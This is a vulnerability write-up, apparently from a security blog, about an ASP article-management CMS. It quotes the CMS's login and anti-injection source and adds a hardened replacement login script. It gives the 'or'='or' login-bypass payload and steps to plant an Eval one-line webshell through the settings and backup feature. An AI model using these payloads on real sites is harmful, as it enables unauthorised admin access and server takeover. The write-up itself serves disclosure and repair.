I just downloaded an ASP website-building system, the "Small Nose Article Management System".
After opening it up, I found it was fairly well made.
By default, I tried the universal password 'or'='or' on the backend login page /admin/login.asp and found that the password got me in.
Let's take a look at the source code.
① The login.asp file
<%
Dim errmsg
' Request() without a collection name reads querystring, form and cookie values alike
username = Request("username")
password = Request("password")
verifycode = Request("verifycode")
If username = "" Or password = "" Then
    Response.Redirect "login.asp?errno=2"
    Response.End
End If
This is the first one. I found that the input is not filtered at all, and then it struck me as strange that the verification code is converted before comparison.
' Captcha check: the session value is compared against the lower-cased, trimmed input
If CStr(Session("getcode")) <> LCase(CStr(Trim(Request("verifycode")))) Then
    Response.Redirect "login.asp?errno=0"
    Response.End
End If
%>
The anti-injection file /inc/AntiAttack.asp consists of two parts:
① ----- Filter the GET query values.
② ----- Filter each value of the POST form.
The POST part of the code is as follows:
<%
' Only runs when the request carried a form body
If Request.Form <> "" Then
    ' Form_Badword is a "‖"-separated blacklist defined elsewhere in the file
    Chk_badword = Split(Form_Badword, "‖")
    For Each form_name2 In Request.Form
        For I = 0 To UBound(Chk_badword)
            ' Substring match of each blacklisted token against the lower-cased field value
            If InStr(LCase(Request.Form(form_name2)), Chk_badword(I)) <> 0 Then
                Select Case Err_Message
                    Case "1"
                        Response.Write "<script language=""JavaScript"">alert('Error! The value of form field " & form_name2 & " contains an invalid string!\nDo not use invalid characters such as % & * # ( ) in the form!');window.close();</script>"
                    Case "2"
                        Response.Write "<script language=""JavaScript"">location.href='" & Err_Web & "';</script>"
                    Case "3"
                        Response.Write "<script language=""JavaScript"">alert('Error! The value of parameter " & form_name2 & " contains an invalid string!\nDo not use invalid characters such as % & * # ( ) in the form!');location.href='" & Err_Web & "';</script>"
                End Select
                Response.End
            End If
        Next
    Next
End If
%>
It starts with "If Request.Form <> """.
Apparently, the username and password on the backend login page are never checked against this filter.
Therefore, you can log straight into the backend using a universal password.
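A hardened replacement for the login.asp fragment, written here as an added example and not taken from the CMS: it reads only Request.Form, checks the captcha the same way on both sides and invalidates it, and binds the credentials as query parameters so a value like 'or'='or' is compared literally rather than parsed as SQL. It assumes a global ADODB connection named conn, an admin table with username and password columns, an errno=1 code for failed logins, and a hypothetical HashPassword() helper.

```vbscript
<%
' Added example, not the CMS's own code: hardened replacement for the login.asp fragment.
' Assumptions: a global ADODB connection "conn", an admin table with columns
' username and password, and a hypothetical HashPassword() helper that returns the
' stored representation of a password (classic ASP has no built-in hash function).
Option Explicit
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

Dim username, password, verifycode, sessioncode, cmd, rs

' Read from Request.Form only: the generic Request() collection also returns
' querystring and cookie values, which a filter that inspects Request.Form never sees.
username   = Trim(Request.Form("username"))
password   = Request.Form("password")
verifycode = LCase(Trim(Request.Form("verifycode")))

If username = "" Or password = "" Then
    Response.Redirect "login.asp?errno=2"
    Response.End
End If

' Normalise the captcha identically on both sides and invalidate it after one attempt.
sessioncode = LCase(Trim(CStr(Session("getcode"))))
Session("getcode") = ""
If sessioncode = "" Or sessioncode <> verifycode Then
    Response.Redirect "login.asp?errno=0"
    Response.End
End If

' Parameterised query: the values are bound as data, so 'or'='or' is compared
' literally against the stored username instead of being parsed as SQL.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT username FROM admin WHERE username = ? AND password = ?"
cmd.Parameters.Append cmd.CreateParameter("username", adVarChar, adParamInput, 50, username)
cmd.Parameters.Append cmd.CreateParameter("password", adVarChar, adParamInput, 64, HashPassword(password))
Set rs = cmd.Execute

If rs.EOF Then
    rs.Close
    Response.Redirect "login.asp?errno=1"
    Response.End
End If
Session("adminname") = rs("username")
rs.Close
Response.Redirect "index.asp"
%>
```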
II. Uploading a shell from the backend
I simply checked the backup function.
First, back up the website and keep the backup for later.
Insert a closing statement in "Website information settings":
%> <% Eval request ("0o1Znz1ow") %> <%
Back up as xx.asp or xx.cer, etc.
Our Trojan will then appear in the /DataBaseX/ directory.
2cto.com repair suggestion: strengthen the login verification in a targeted way, and add authentication and filtering to the backup function area.
From sentiment blog